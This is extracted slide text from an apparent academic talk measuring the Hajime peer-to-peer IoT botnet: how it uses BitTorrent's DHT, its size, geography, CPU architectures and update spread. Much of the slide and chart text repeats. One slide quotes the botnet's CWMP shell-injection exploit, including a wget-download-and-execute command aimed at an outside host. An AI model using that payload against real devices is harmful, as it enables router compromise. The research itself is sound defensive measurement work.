Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet
University of Maryland
Stephen Herwig Katura Harvey George Hughey Richard Roberts Dave Levin
The Max Planck Institutefor Software Systems+
Rise of IoT Botnets
HajimeResilient C&CTargets many CPU archesScanning behavior arch-specificContinuously deploys new exploits
Talk Overview
Describe Hajime P2P networkOur measurement infrastructure
AnalyzeHeterogeneous botnet compositionImpact of three exploit deployments
Discuss Challenges of new, resilient botnets
BitTorrent’s P2P NetworkUses a DHT to track who is downloading what
BitTorrent’s P2P NetworkUses a DHT to track who is downloading what
Hostingfile named F
announce hash(F)
BitTorrent’s P2P NetworkUses a DHT to track who is downloading what
Hosting hash(F)
Hostingfile named F
announce hash(F)
BitTorrent’s P2P NetworkUses a DHT to track who is downloading what
Hosting hash(F)
Wants todownload F
Hostingfile named F
announce hash(F)
lookup hash(F)
Provides random subsets of current uploaders
BitTorrent’s P2P NetworkUses a DHT to track who is downloading what
Hosting hash(F)
Wants todownload F
Hostingfile named F
announce hash(F)
lookup hash(F)
Provides random subsets of current uploaders
Hajime’s P2P Network① Uses BitTorrent’s DHT to find other bots
Downloading
Hosting
lookup hash(F)
Hosting hash(F)
Randomsubset
announce hash(F)
Hajime’s P2P Network① Uses BitTorrent’s DHT to find other bots
announce hash(F)
Date
File type
Architecture
MIPS little endianMIPS big endianARM v5ARM v6ARM v7
Once per day
.i – “infect”
.atk – “attack”
Every day, bots are announcing
their actions
and their devices’ architectures
Hajime’s design is primed for measurement!
Hajime’s P2P Network② Fetch files directly from one another
Downloading
Hosting
lookup hash(F)
Hosting hash(F)
announce hash(F)
Hajime’s P2P Network② Fetch files directly from one another
Downloading
Hosting
Keys provide long-lived identifiers
Request FileKey exchange
Hajime’s P2P Network
② Fetch files directly from one another
Difficult to take down Hajime (without also taking down BitTorrent)
① Uses BitTorrent’s DHT to find other bots
Difficult to centrally monitor
Hajime is a resilient next step in IoT botnets
Measuring Hajime’s P2P network① Exhaustively list all peers
lookup hash(F)
Hosting hash(F)
Randomsubset
Measuring Hajime’s P2P network① Exhaustively list all peers
lookup hash(F)
Hosting hash(F)
Measuring Hajime’s P2P network① Exhaustively list all peers
lookup hash(F)
Hosting hash(F)
Measuring Hajime’s P2P network① Exhaustively list all peers
Every 16 minutes for 4 months5,404,045 total IP addresses found
i/mipseb/today
atk/arm7/today i/mipsel/tomorrow
atk/arm5/yesterday
Measuring Hajime’s P2P network② Obtain each Hajime bot’s public key
10,536,174 total keys found
Key exchange
Measuring Hajime’s P2P network② Obtain each Hajime bot’s public key
10,536,174 total keys found
Key exchange0
20K
40K
60K
80K
100K
120K
0 20K 40K 60K 80K 100K
Keys
IPs
IranMexicoChinaIndia
South KoreaUnited States
TurkeyRussia
Indonesia
NATs undercount bots based on IPs
0
100K
200K
300K
400K
500K
600K
700K
800K
900K
0 100K 200K 300K 400K 500K 600K 700K 800K 900K
Keys
IPs
IranMexicoChinaIndia
South KoreaUnited States
TurkeyRussia
IndonesiaBrazil
Measuring Hajime’s P2P network② Obtain each Hajime bot’s public key
10,536,174 total keys found
Key exchange
IP reassignment overcounts bots based on IPs
Datasets
5,404,045 unique IP addresses
DHT scans
10,536,174 unique keys
Key scans
47 modules34 .atk, 13 .i
Reverse eng
Jan 25, 2018 – Jun 1, 2018
All available at iot.cs.umd.edu
Analysis Questions
How large is the botnet?Where are bots located?What devices makeup the botnet?
How do exploits change the botnet?How quickly does Hajime update itself?How does Hajime deploy new exploits?
Dynamics
Characteristics
How big is Hajime?
0K10K20K30K40K50K60K70K80K90K
100K
01-26 02-09 02-23 03-09 03-23 04-06 04-20 05-04 05-18 06-01
Num
ber o
f dis
tinct
bot
s
Time (20-minute bins)
atk.mipseb update.i.mipseb update
How big is Hajime?
0K10K20K30K40K50K60K70K80K90K
100K
01-26 02-09 02-23 03-09 03-23 04-06 04-20 05-04 05-18 06-01
Num
ber o
f dis
tinct
bot
s
Time (20-minute bins)
atk.mipseb update.i.mipseb update
Steady-state of ~40K bots
Peaks of 95K after Chimay-Red and GPON exploits
0K10K20K30K40K50K60K70K80K90K
100K
01-26 02-09 02-23 03-09 03-23 04-06 04-20 05-04 05-18 06-01
Num
ber o
f dis
tinct
bot
s
Time (20-minute bins)
OthersBrazil
Iran
MexicoChinaIndia
S. KoreaUS
Turkey
RussiaIndonesia
atk.mipseb update.i.mipseb update
Where are bots located?
Where are bots located?
0K10K20K30K40K50K60K70K80K90K
100K
01-26 02-09 02-23 03-09 03-23 04-06 04-20 05-04 05-18 06-01
Num
ber o
f dis
tinct
bot
s
Time (20-minute bins)
OthersBrazil
Iran
MexicoChinaIndia
S. KoreaUS
Turkey
RussiaIndonesia
atk.mipseb update.i.mipseb update
Where are bots located?
0K10K20K30K40K50K60K70K80K90K
100K
01-26 02-09 02-23 03-09 03-23 04-06 04-20 05-04 05-18 06-01
Num
ber o
f dis
tinct
bot
s
Time (20-minute bins)
OthersBrazil
Iran
MexicoChinaIndia
S. KoreaUS
Turkey
RussiaIndonesia
atk.mipseb update.i.mipseb update
The geographic makeup of IoT botnets can change rapidly
Chimay-Red Russia expanded500 → 6,000 hourly
Where are bots located?
0K10K20K30K40K50K60K70K80K90K
100K
01-26 02-09 02-23 03-09 03-23 04-06 04-20 05-04 05-18 06-01
Num
ber o
f dis
tinct
bot
s
Time (20-minute bins)
OthersBrazil
Iran
MexicoChinaIndia
S. KoreaUS
Turkey
RussiaIndonesia
atk.mipseb update.i.mipseb update
The geographic makeup of IoT botnets can change rapidly
Chimay-Red Russia expanded500 → 6,000 hourly GPON Mostly affected
Mexico
0K
10K
20K
30K
40K
50K
60K
70K
80K
90K
100K
01-26 02-09 02-23 03-09 03-23 04-06 04-20 05-04 05-18 06-01
Num
ber o
f dis
tinct
bot
s
Time (20-minute bins)
atk.mipseb update.i.mipseb update
mipsebmipsel
arm7arm6arm5
What CPU architectures are most infected?
0K
10K
20K
30K
40K
50K
60K
70K
80K
90K
100K
01-26 02-09 02-23 03-09 03-23 04-06 04-20 05-04 05-18 06-01
Num
ber o
f dis
tinct
bot
s
Time (20-minute bins)
atk.mipseb update.i.mipseb update
mipsebmipsel
arm7arm6arm5
What CPU architectures are most infected?
Devices overwhelmingly run MIPS
74.2% of bot devices are MIPS big-endian (mipseb)
0K
100K
200K
300K
400K
500K
600K
BR CN IR IN KR US TR RU MX IT
Num
ber o
f dis
tinct
bot
s
Country
arm5arm6arm7mipselmipseb
unknown4M
5M
4M
5M
Brazil China Iran India Korea US Turkey Russia Mexico
How does CPU architecture vary by country?
0K
100K
200K
300K
400K
500K
600K
BR IR MX CN IN KR US TR RU ID
Num
ber o
f dis
tinct
bot
s
Country
arm5arm6arm7mipselmipseb
unknown4M
5M
4M
5M
0K
100K
200K
300K
400K
500K
600K
BR CN IR IN KR US TR RU MX IT
Num
ber o
f dis
tinct
bot
s
Country
arm5arm6arm7mipselmipseb
unknown4M
5M
4M
5M
Brazil China Iran India Korea US Turkey Russia Mexico
How does CPU architecture vary by country?
0K
100K
200K
300K
400K
500K
600K
BR IR MX CN IN KR US TR RU ID
Num
ber o
f dis
tinct
bot
s
Country
arm5arm6arm7mipselmipseb
unknown4M
5M
4M
5M
IoT botnets are highly heterogeneous across the world
After the introduction of the GPON vulnerability
0K
100K
200K
300K
400K
500K
600K
BR CN IR IN KR US TR RU MX IT
Num
ber o
f dis
tinct
bot
s
Country
arm5arm6arm7mipselmipseb
unknown4M
5M
4M
5M
Brazil China Iran India Korea US Turkey Russia Mexico0K
100K
200K
300K
400K
500K
600K
BR IR MX CN IN KR US TR RU ID
Num
ber o
f dis
tinct
bot
s
Country
arm5arm6arm7mipselmipseb
unknown4M
5M
4M
5M
How does CPU architecture vary by country?After the introduction of the GPON vulnerability
New vulnerabilities can lead to drastic changesin geography
0K
100K
200K
300K
400K
500K
600K
BR CN IR IN KR US TR RU MX IT
Num
ber o
f dis
tinct
bot
s
Country
arm5arm6arm7mipselmipseb
unknown4M
5M
4M
5M
Mexico0K
100K
200K
300K
400K
500K
600K
BR IR MX CN IN KR US TR RU ID
Num
ber o
f dis
tinct
bot
s
Country
arm5arm6arm7mipselmipseb
unknown4M
5M
4M
5M
How does CPU architecture vary by country?After the introduction of the GPON vulnerability
New vulnerabilities can lead to drastic changesin geography
0K
100K
200K
300K
400K
500K
600K
BR CN IR IN KR US TR RU MX IT
Num
ber o
f dis
tinct
bot
s
Country
arm5arm6arm7mipselmipseb
unknown4M
5M
4M
5M
Mexico0K
100K
200K
300K
400K
500K
600K
BR IR MX CN IN KR US TR RU ID
Num
ber o
f dis
tinct
bot
s
Country
arm5arm6arm7mipselmipseb
unknown4M
5M
4M
5M
How does CPU architecture vary by country?
MexicobeforeGPON
afterGPON
Mexico changed from primarily ARM to primarily MIPS
New vulnerabilities can lead to drastic changesin geography
0K
100K
200K
300K
400K
500K
600K
BR CN IR IN KR US TR RU MX IT
Num
ber o
f dis
tinct
bot
s
Country
arm5arm6arm7mipselmipseb
unknown4M
5M
4M
5M
Mexico0K
100K
200K
300K
400K
500K
600K
BR IR MX CN IN KR US TR RU ID
Num
ber o
f dis
tinct
bot
s
Country
arm5arm6arm7mipselmipseb
unknown4M
5M
4M
5M
How does CPU architecture vary by country?
MexicobeforeGPON
afterGPON
Mexico changed from primarily ARM to primarily MIPS
New vulnerabilities can lead to drastic changesin geography and composition
What devices are infected?
DHT scans
Censys
What devices are infected?
DHT scans
Censys
No device information on over 80%of bot IP addresses
Of those identifiable: 0.8% MikroTik day before Chimay-Red 80.3% day after
How quickly does Hajimedisseminate module updates?
% of mipseb bots hosting or looking up each file version
0
20
40
60
80
100
03-15 03-29 04-12 04-26 05-10 05-24
% o
f bot
s pe
r.i
vers
ion
Time (20-minute bins)
0
20
40
60
80
100
% o
f bot
s pe
rat
k ve
rsio
n
How quickly does Hajimedisseminate module updates?
% of mipseb bots hosting or looking up each file version
0
20
40
60
80
100
03-15 03-29 04-12 04-26 05-10 05-24
% o
f bot
s pe
r.i
vers
ion
Time (20-minute bins)
0
20
40
60
80
100
% o
f bot
s pe
rat
k ve
rsio
n
Quick
How quickly does Hajimedisseminate module updates?
0
20
40
60
80
100
03-15 03-29 04-12 04-26 05-10 05-24
% o
f bot
s pe
r.i
vers
ion
Time (20-minute bins)
0
20
40
60
80
100
% o
f bot
s pe
rat
k ve
rsio
n% of mipseb bots hosting or looking up each file version
Quick
Inconsistent
A new . i clears old atks.
Hajime’s CWMP exploit
<NewNTPServer1>SHELL_INJECTION</NewNTPServer1>
cd /tmp;wget http://1.2.3.4:5678/3; chmod 777 3;./3
Attacking a non-vulnerable host
<NewNTPServer1>SHELL_INJECTION</NewNTPServer1>
“This is a domain name”
Attacking a non-vulnerable host
<NewNTPServer1>SHELL_INJECTION</NewNTPServer1>
Local DNSResolver
cd /tmp;wget http://1.2.3.4:5678/3; chmod 777 3;./3
“What’s this TLD?”
Attacking a non-vulnerable host
<NewNTPServer1>SHELL_INJECTION</NewNTPServer1>
Local DNSResolver
cd /tmp;wget http://1.2.3.4:5678/3; chmod 777 3;./3
D-root
NXDOMAINNXDOMAIN
“What’s this TLD?”
What we learn from D-root
Local DNSResolver
D-root
✔✔
DNS Backscatter
A sample of attack attempts worldwide
But only to non-vulnerable hosts
DNS Backscatter: Mirai vs. Hajime
0
10K
20K
30K
40K
50K
60K
11/16 01/17 03/17 05/17 07/17 09/17 11/17 01/18 03/18 05/18
TR-0
64 in
ject
ion
atte
mpt
s
Time (20-minute bins)
DNS Backscatter: Mirai vs. Hajime
0
10K
20K
30K
40K
50K
60K
11/16 01/17 03/17 05/17 07/17 09/17 11/17 01/18 03/18 05/18
TR-0
64 in
ject
ion
atte
mpt
s
Time (20-minute bins)
Mirai
0
10K
20K
30K
40K
50K
60K
11/16 01/17 03/17 05/17 07/17 09/17 11/17 01/18 03/18 05/18
TR-0
64 in
ject
ion
atte
mpt
s
Time (20-minute bins)
HajimeMirai
config update.i.mipseb update
atk.mipseb update.i.mipsel update
atk.mipsel update
DNS Backscatter: Mirai vs. Hajime
Where is Hajime from?
Initial (test?) CWMP attack came from the Netherlands
47 modules34 .atk, 13 .i
Reverse eng
Hajime blacklists the same IP address as Mirai, plus: 77.247.0.0/16 85.159.0.0/16 109.201.0.0/16
These have one ISP in common: NFOrce Entertainment (located in the Netherlands)
0
10K
20K
30K
40K
50K
60K
11/16 01/17 03/17 05/17 07/17 09/17 11/17 01/18 03/18 05/18
TR-0
64 in
ject
ion
atte
mpt
s
Time (20-minute bins)
HajimeMirai
config update.i.mipseb update
atk.mipseb update.i.mipsel update
atk.mipsel update
Also covered in the paper
- Details on bot internals and exploits
- Analysis of bot churn
- Details on device fingerprinting
- Country-level analysis of CWMP DNS backscatter
Measuring and analyzing HajimeDHT scans D-root
IoT botnets have highly heterogeneous architectures
Code and data coming soon: iot.cs.umd.edu
Key scans
New vulnerabilities can lead todrastic changes in size, geography, and composition
IoT botnets areresilient and large 40K steady 95K peak